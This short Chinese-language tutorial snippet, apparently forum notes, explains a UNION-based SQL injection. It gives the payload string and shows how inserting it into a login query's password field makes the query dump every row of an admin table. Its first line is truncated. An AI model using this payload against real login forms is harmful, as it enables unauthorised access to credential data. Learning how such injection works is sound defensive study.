1' union select * from [ADM] union select * fr

union联合意思把两标拼接起来

当两表结构或者所选择字段相同时候才使用Union方法否则会出错
-----------------
也要人家用了字符串拼接SQL语句台才能用用PROC注入了
#######
打比方
原始SQL
SELECT * FROM [ADM] WHERE USERID='ADMIN' AND PASSWORD = 'PASS'

现ADMIN或者PASS地方插入语句 也变成了
SELECT * FROM [ADM] WHERE USERID='ADMIN' AND PASSWORD = '1' union select * from [ADM] union select * from [ADM] where '1'='1'

前面SELECT * FROM [ADM] WHERE USERID='ADMIN' AND PASSWORD = '1' 肯定数据都会出来
下面还有句UNION
select * from [ADM] union select * from [ADM] where '1'='1'

而1=1条件真所会把[ADM] 所有数据都给抽出来